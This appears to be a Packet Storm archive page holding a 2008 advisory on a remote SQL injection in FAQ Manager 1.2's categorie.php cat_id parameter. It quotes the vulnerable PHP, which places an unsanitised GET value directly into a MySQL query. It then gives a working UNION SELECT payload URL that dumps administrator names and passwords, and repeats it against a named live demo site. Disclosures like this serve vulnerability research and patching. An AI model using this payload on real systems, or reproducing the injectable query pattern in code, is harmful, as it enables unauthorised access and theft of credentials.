exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

faqmanager-sql.txt

faqmanager-sql.txt
Posted Nov 25, 2008
Authored by cOndemned | Site condemned.r00t.la

FAQ Manager version 1.2 suffers from a remote SQL injection vulnerability in categorie.php.

tags | exploit, remote, php, sql injection
SHA-256 | fbfe26dc686355e0b46d58694faa8c4f4bb39e0213834539ebdb75521450d35b

faqmanager-sql.txt

Change Mirror Download
+---------------------------------------------------------------------------------------+
| |
| FAQ Manager 1.2 (categorie.php cat_id) Remote SQL Injection Vulnerability |
| Bug found by cOndemned |
| |
| Script site : http://www.4yoursite.nl/script_faq_manager.php |
| |
| Greetz: ZaBeaTy, str0ke, doctor, Necro, 0in, TBH, Av... |
| |
+---------------------------------------------------------------------------------------+


# source of categorie.php

[ ... ]

21. $catid = $_GET['cat_id'];

[ ... ]

72. $faq_query = mysql_query("SELECT * FROM `".$prefix."_faq` WHERE `faq_cat_id` = $catid");

73. while($faq = mysql_fetch_assoc($faq_query))

74. {

75. $faq_cat_id = ($faq['faq_cat_id']);

76. }

77.

78. $result = mysql_query("SELECT * FROM `".$prefix."_faq` WHERE `faq_cat_id` = $catid");

[ ... ]


# proof of concept

http://[host]/[faq_manager_path]/catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin/*


# live demo

http://www.4yoursite.nl/demo/faq_manager/catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin/*


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close